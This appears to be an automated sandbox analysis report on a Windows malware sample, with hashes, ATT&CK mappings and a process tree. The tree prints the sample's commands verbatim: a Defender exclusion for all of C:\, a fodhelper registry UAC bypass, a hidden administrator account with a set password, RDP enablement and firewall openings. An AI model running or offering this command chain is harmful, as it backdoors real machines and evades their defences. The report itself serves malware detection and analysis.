7bc2536f2b4f69cb20c0d7f996aaedafab15cf4d73f54792e74ac72be3ecf01f

Analysis

max time kernel
148s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28-05-2024 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a3e4a7c4f37f185ccd7696eece42348c.exe
Size

117KB
MD5

a3e4a7c4f37f185ccd7696eece42348c
SHA1

f9cbc1d00796fe5a8debaef74d59c567277bfd60
SHA256

7bc2536f2b4f69cb20c0d7f996aaedafab15cf4d73f54792e74ac72be3ecf01f
SHA512

0f8396c64ec0bd8d9c97ea75811269e7e9cc4c388b770343b59f54c89663f51bce9df4aabda0095e1a37c801e01badbb1c8976479d6aa430fccff8dfea431353
SSDEEP

384:Gmjw/SoQzbZlKp6yTcKnwYQFITaxV+avOUrIL+330jaYtL5oNEASAFxG/yD494JI:G+LbqpHwmMREo0jaf6sFSyD5rh2T

Score

9^/10

evasion execution persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3480	powershell.exe
3108	powershell.exe
4248	PowerShell.exe
2540	PowerShell.exe

Downloads MZ/PE file
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
380	netsh.exe
1944	netsh.exe
4048	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	ddttd.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1812	attrib.exe

Allows Network login with blank passwords 1 TTPs 1 IoCs

Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol

T1021.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	svrreve.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	svrreve.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	a3e4a7c4f37f185ccd7696eece42348c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	6PkklzQ3.exe

Executes dropped EXE 3 IoCs

pid	Process
3520	6PkklzQ3.exe
2228	svrreve.exe
4980	ddttd.exe

Loads dropped DLL 1 IoCs

pid	Process
4796	svchost.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0005000000000719-96.dat	upx
behavioral2/memory/4980-98-0x0000000000400000-0x00000000005AF000-memory.dmp	upx
behavioral2/files/0x000300000000073f-102.dat	upx
behavioral2/memory/4796-104-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp	upx
behavioral2/memory/4980-106-0x0000000000400000-0x00000000005AF000-memory.dmp	upx
behavioral2/memory/4796-108-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xohtsts = "\"C:\\ProgramData\\uovan\\svrreve.exe\""	svrreve.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
41	pastebin.com
42	pastebin.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	ddttd.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	ddttd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	ddttd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	ddttd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1460	timeout.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell	svrreve.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	svrreve.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell	svrreve.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open\command	svrreve.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings	svrreve.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open	svrreve.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/Snup.bat"	svrreve.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open\command	svrreve.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open	svrreve.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings	svrreve.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ddttd.exe -i"	svrreve.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3480	powershell.exe
3480	powershell.exe
2228	svrreve.exe
4248	PowerShell.exe
4248	PowerShell.exe
3108	powershell.exe
3108	powershell.exe
2540	PowerShell.exe
2540	PowerShell.exe
4796	svchost.exe
4796	svchost.exe
4796	svchost.exe
4796	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1584	a3e4a7c4f37f185ccd7696eece42348c.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	3520	6PkklzQ3.exe
Token: SeDebugPrivilege	2228	svrreve.exe
Token: SeDebugPrivilege	4944	whoami.exe
Token: SeDebugPrivilege	4248	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	2024	WMIC.exe
Token: SeSecurityPrivilege	2024	WMIC.exe
Token: SeTakeOwnershipPrivilege	2024	WMIC.exe
Token: SeLoadDriverPrivilege	2024	WMIC.exe
Token: SeSystemProfilePrivilege	2024	WMIC.exe
Token: SeSystemtimePrivilege	2024	WMIC.exe
Token: SeProfSingleProcessPrivilege	2024	WMIC.exe
Token: SeIncBasePriorityPrivilege	2024	WMIC.exe
Token: SeCreatePagefilePrivilege	2024	WMIC.exe
Token: SeBackupPrivilege	2024	WMIC.exe
Token: SeRestorePrivilege	2024	WMIC.exe
Token: SeShutdownPrivilege	2024	WMIC.exe
Token: SeDebugPrivilege	2024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2024	WMIC.exe
Token: SeRemoteShutdownPrivilege	2024	WMIC.exe
Token: SeUndockPrivilege	2024	WMIC.exe
Token: SeManageVolumePrivilege	2024	WMIC.exe
Token: 33	2024	WMIC.exe
Token: 34	2024	WMIC.exe
Token: 35	2024	WMIC.exe
Token: 36	2024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2024	WMIC.exe
Token: SeSecurityPrivilege	2024	WMIC.exe
Token: SeTakeOwnershipPrivilege	2024	WMIC.exe
Token: SeLoadDriverPrivilege	2024	WMIC.exe
Token: SeSystemProfilePrivilege	2024	WMIC.exe
Token: SeSystemtimePrivilege	2024	WMIC.exe
Token: SeProfSingleProcessPrivilege	2024	WMIC.exe
Token: SeIncBasePriorityPrivilege	2024	WMIC.exe
Token: SeCreatePagefilePrivilege	2024	WMIC.exe
Token: SeBackupPrivilege	2024	WMIC.exe
Token: SeRestorePrivilege	2024	WMIC.exe
Token: SeShutdownPrivilege	2024	WMIC.exe
Token: SeDebugPrivilege	2024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2024	WMIC.exe
Token: SeRemoteShutdownPrivilege	2024	WMIC.exe
Token: SeUndockPrivilege	2024	WMIC.exe
Token: SeManageVolumePrivilege	2024	WMIC.exe
Token: 33	2024	WMIC.exe
Token: 34	2024	WMIC.exe
Token: 35	2024	WMIC.exe
Token: 36	2024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2012	WMIC.exe
Token: SeSecurityPrivilege	2012	WMIC.exe
Token: SeTakeOwnershipPrivilege	2012	WMIC.exe
Token: SeLoadDriverPrivilege	2012	WMIC.exe
Token: SeSystemProfilePrivilege	2012	WMIC.exe
Token: SeSystemtimePrivilege	2012	WMIC.exe
Token: SeProfSingleProcessPrivilege	2012	WMIC.exe
Token: SeIncBasePriorityPrivilege	2012	WMIC.exe
Token: SeCreatePagefilePrivilege	2012	WMIC.exe
Token: SeBackupPrivilege	2012	WMIC.exe
Token: SeRestorePrivilege	2012	WMIC.exe
Token: SeShutdownPrivilege	2012	WMIC.exe
Token: SeDebugPrivilege	2012	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2012	WMIC.exe
Token: SeRemoteShutdownPrivilege	2012	WMIC.exe
Token: SeUndockPrivilege	2012	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 1428	1584	a3e4a7c4f37f185ccd7696eece42348c.exe	81
PID 1584 wrote to memory of 1428	1584	a3e4a7c4f37f185ccd7696eece42348c.exe	81
PID 1428 wrote to memory of 436	1428	cmd.exe	83
PID 1428 wrote to memory of 436	1428	cmd.exe	83
PID 436 wrote to memory of 3480	436	cmd.exe	85
PID 436 wrote to memory of 3480	436	cmd.exe	85
PID 1584 wrote to memory of 3520	1584	a3e4a7c4f37f185ccd7696eece42348c.exe	97
PID 1584 wrote to memory of 3520	1584	a3e4a7c4f37f185ccd7696eece42348c.exe	97
PID 3520 wrote to memory of 2228	3520	6PkklzQ3.exe	98
PID 3520 wrote to memory of 2228	3520	6PkklzQ3.exe	98
PID 3520 wrote to memory of 2816	3520	6PkklzQ3.exe	99
PID 3520 wrote to memory of 2816	3520	6PkklzQ3.exe	99
PID 2816 wrote to memory of 1460	2816	cmd.exe	101
PID 2816 wrote to memory of 1460	2816	cmd.exe	101
PID 2816 wrote to memory of 4944	2816	cmd.exe	102
PID 2816 wrote to memory of 4944	2816	cmd.exe	102
PID 2228 wrote to memory of 1480	2228	svrreve.exe	103
PID 2228 wrote to memory of 1480	2228	svrreve.exe	103
PID 1480 wrote to memory of 4248	1480	fodhelper.exe	104
PID 1480 wrote to memory of 4248	1480	fodhelper.exe	104
PID 4248 wrote to memory of 3436	4248	PowerShell.exe	106
PID 4248 wrote to memory of 3436	4248	PowerShell.exe	106
PID 3436 wrote to memory of 700	3436	cmd.exe	107
PID 3436 wrote to memory of 700	3436	cmd.exe	107
PID 700 wrote to memory of 2024	700	cmd.exe	108
PID 700 wrote to memory of 2024	700	cmd.exe	108
PID 700 wrote to memory of 4616	700	cmd.exe	109
PID 700 wrote to memory of 4616	700	cmd.exe	109
PID 3436 wrote to memory of 1404	3436	cmd.exe	110
PID 3436 wrote to memory of 1404	3436	cmd.exe	110
PID 1404 wrote to memory of 3332	1404	net.exe	111
PID 1404 wrote to memory of 3332	1404	net.exe	111
PID 3436 wrote to memory of 4204	3436	cmd.exe	112
PID 3436 wrote to memory of 4204	3436	cmd.exe	112
PID 4204 wrote to memory of 4124	4204	net.exe	113
PID 4204 wrote to memory of 4124	4204	net.exe	113
PID 3436 wrote to memory of 2332	3436	cmd.exe	114
PID 3436 wrote to memory of 2332	3436	cmd.exe	114
PID 2332 wrote to memory of 2012	2332	cmd.exe	115
PID 2332 wrote to memory of 2012	2332	cmd.exe	115
PID 2332 wrote to memory of 4376	2332	cmd.exe	116
PID 2332 wrote to memory of 4376	2332	cmd.exe	116
PID 3436 wrote to memory of 1388	3436	cmd.exe	117
PID 3436 wrote to memory of 1388	3436	cmd.exe	117
PID 1388 wrote to memory of 3024	1388	net.exe	118
PID 1388 wrote to memory of 3024	1388	net.exe	118
PID 3436 wrote to memory of 2212	3436	cmd.exe	119
PID 3436 wrote to memory of 2212	3436	cmd.exe	119
PID 2212 wrote to memory of 1940	2212	net.exe	120
PID 2212 wrote to memory of 1940	2212	net.exe	120
PID 3436 wrote to memory of 5012	3436	cmd.exe	121
PID 3436 wrote to memory of 5012	3436	cmd.exe	121
PID 3436 wrote to memory of 960	3436	cmd.exe	122
PID 3436 wrote to memory of 960	3436	cmd.exe	122
PID 3436 wrote to memory of 2760	3436	cmd.exe	123
PID 3436 wrote to memory of 2760	3436	cmd.exe	123
PID 3436 wrote to memory of 2444	3436	cmd.exe	124
PID 3436 wrote to memory of 2444	3436	cmd.exe	124
PID 3436 wrote to memory of 3552	3436	cmd.exe	125
PID 3436 wrote to memory of 3552	3436	cmd.exe	125
PID 3436 wrote to memory of 2856	3436	cmd.exe	126
PID 3436 wrote to memory of 2856	3436	cmd.exe	126
PID 3436 wrote to memory of 2272	3436	cmd.exe	127
PID 3436 wrote to memory of 2272	3436	cmd.exe	127

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1812	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a3e4a7c4f37f185ccd7696eece42348c.exe
"C:\Users\Admin\AppData\Local\Temp\a3e4a7c4f37f185ccd7696eece42348c.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /min "xs [DarkTeam]" "cmd.exe" "/k @echo off && powershell.exe -Command Add-MpPreference -ExclusionPath C:\ && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Windows\system32\cmd.exe
    "cmd.exe" "/k @echo off && powershell.exe -Command Add-MpPreference -ExclusionPath C:\ && exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command Add-MpPreference -ExclusionPath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3480
- C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe
  "C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\ProgramData\uovan\svrreve.exe
    "C:\ProgramData\uovan\svrreve.exe"
    3⤵
    - Allows Network login with blank passwords
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4248
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:700
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
        
        C:\Windows\system32\find.exe
        
        Find "="
        8⤵
        
        PID:4616
        
        C:\Windows\system32\net.exe
        
        net user defaultuserx StffXruf3331 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1404
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user defaultuserx StffXruf3331 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        8⤵
        
        PID:3332
        
        C:\Windows\system32\net.exe
        
        net localgroup Administrators defaultuserx /add
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4204
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators defaultuserx /add
        8⤵
        
        PID:4124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2332
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
        
        C:\Windows\system32\find.exe
        
        Find "="
        8⤵
        
        PID:4376
        
        C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" defaultuserx /add
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" defaultuserx /add
        8⤵
        
        PID:3024
        
        C:\Windows\system32\net.exe
        
        net accounts /forcelogoff:no /maxpwage:unlimited
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        8⤵
        
        PID:1940
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
        7⤵
        
        PID:5012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f
        7⤵
        
        PID:960
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:2760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\Licensing Core" /v "EnableConcurrentSessions" /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:2444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:3552
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:2856
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:2272
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 0xd3d /f
        7⤵
        
        PID:3656
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v defaultuserx /t REG_DWORD /d 0x0 /f
        7⤵
        
        PID:764
        
        C:\Windows\system32\attrib.exe
        
        attrib C:\users\defaultuserx +r +a +s +h
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1812
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall del rule="Remote Desktop"
        7⤵
        Modifies Windows Firewall
        
        PID:380
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 action=allow
        7⤵
        Modifies Windows Firewall
        
        PID:1944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3108
  - - C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      4⤵
      PID:2032
    - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ddttd.exe -i
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2540
      - C:\Users\Admin\AppData\Local\Temp\ddttd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ddttd.exe" -i
        6⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:4980
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        7⤵
        Modifies Windows Firewall
        
        PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF54D.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\system32\timeout.exe
      timeout 7
      4⤵
      Delays execution with timeout.exe
      PID:1460
  - - C:\Windows\system32\whoami.exe
      whoami
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
450427af6be6ec710ffb349487871490

SHA1
7cc431b8914d68e01b451a3f6b3e718e22a410a0

SHA256
770115f2b5578724e6f35f1dc5ea28c064c53e8c3e60c69342969cc919d9b23a

SHA512
754766f7221e5598fdc449d83789aaa0961a5d9f9f0571c93f92b06db418aca282fcd31443e737967cf288b1c24d84aa2a8f19a9b799b5f02482954b3c0febb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
79338af2a98e6975ffb2ff2cfcd91c45

SHA1
85b70526440a7c93fddd6334cb8243c72bc34a43

SHA256
0c86eaea0e79eff377ec82d6d2f4867b750725173916e9699b567ab2ff0137a7

SHA512
aba86beb5b6a6660010675e4430b5b6a67480e8ebb0a3629a7c47244c29badc19067aee2521706d64f8db6d70aaf388a259060ff5952fdac4c8320dcc1618c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe

Filesize
1.9MB

MD5
7ddeccf7c147ea2b90426aeb43277096

SHA1
a350f7403f25add29a464491d37f56b5381d4a73

SHA256
f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb

SHA512
2b0f23fdc66cfe90c329474669109320694107f140e5d3b95338833211b4c6fa58a627583babd256fb045444f609020ce544c2a3c14e5d85c46ee76bc71ca7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Snup.bat

Filesize
2KB

MD5
6df063e63ff09a93c843408e90735396

SHA1
00d4f793ca9f1862999c616304149aca9f3b3ee4

SHA256
874c94bafb1361799e79e58580cf474fe4406a191e4533c86181dd73f4b34676

SHA512
c38c1525398a2b2d2a96a63f1e1e905861b6db7bca41f9548fd3f352fe8ca74bee6fc798b4a2dc711db98dde765548b5adca31bd2c00b9da38f90f404c109abd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0wj2qxp.u3i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ddttd.exe

Filesize
457KB

MD5
75d0509f3674ab4ea21964828a94050c

SHA1
9e9a9b703e4de7006822ef6aa525389c67a5b2f7

SHA256
cbdca2f7e9e90275b946b7e87061092b127b46e5474f26b27093f7ce24e54d8d

SHA512
0f1360b520e402bcc3d9ddc9a163b93ced0ef535d9b85c2cb057585c8e0cc00cc5627a02b5b9caca6b32bc641d8e5f815c48257091b66ab7bb84baf97892dfeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF54D.tmp.bat

Filesize
168B

MD5
c1db761548a7415e39e98d8aba9303ad

SHA1
a39be21074c93ee0d98f74203950cc81ea4e9349

SHA256
d8ac4a9e17f1b74f935258dbf87f975e409636e190a3416d26c14f20957454ac

SHA512
1de0d3209d0b31264ec5b41375090559a8564bda1b9a7befd7875eabb94da9c5671f763fac107968d8b7d155d147e2793db174bef4590fb0d5cd037df79a3a65

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
3163a2ed27b343407c0642536887c814

SHA1
6f4a8a156fb7deaa042ba2ec0a90c3deeb2bf414

SHA256
8953c8cc136b22ab7631e8129e643bc79db32a0aa724c10b6655c12e167eb4b5

SHA512
f34335f5b54c59891e992484b22b594e77355b82fa4376c973905081a495cce15bc505603b52b87798da8e42cabc4449dfdb63f4171dba6f07c4a236bf7eb108

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
14838e80c410d2c34180ed0e23a6acee

SHA1
5f44a1239591ec8a887bb45916fad9196d7bf8a5

SHA256
c884cfe23b45eff6d0474d64a90d238e1e63d2f525c9a8ee83a4bb7684edb974

SHA512
12c20b4df6ca721f928d87cfaf1cec6c8639253fe11702965018eef58387a1ba03f24b092b26b3fef2ac480bc2ddd0caecfcb697b8353ef5231afbcac8542a05

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
